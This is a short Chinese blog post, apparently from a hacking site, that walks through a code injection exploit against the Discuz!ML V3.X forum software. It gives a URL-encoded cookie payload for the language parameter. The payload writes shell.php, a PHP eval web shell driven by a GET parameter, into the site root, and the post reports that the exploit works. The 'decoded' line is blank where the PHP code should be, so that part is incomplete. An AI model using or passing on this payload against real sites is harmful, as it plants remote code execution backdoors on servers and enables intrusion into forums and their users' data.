Discuz!ML V3.X 代码注入利用过程

发布于 / 中文文章 / 0 条评论

Discuz!ML官网下载:http://discuz.ml/download

我下的是官网最新版x3.4。

大约共有60多个页面可以利用,包含论坛主页。

GET一下然后找到cookie里面的xxxlanguage参数,将xxx_language的值改为exp的内容,然后提交并返回200。

exp:

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524%2547%2545%2554%255b%2522ss%2522%255d%29%253b%253f%253e%27%29%29.%27

解码:

'. file_put_contents('shell.php',urldecode('')).'

访问主页后,根目录下会生成一个shell.php文件。

利用成功

转载原创文章请注明,转载自: Pikachu Hacker » Discuz!ML V3.X 代码注入利用过程
Not Comment Found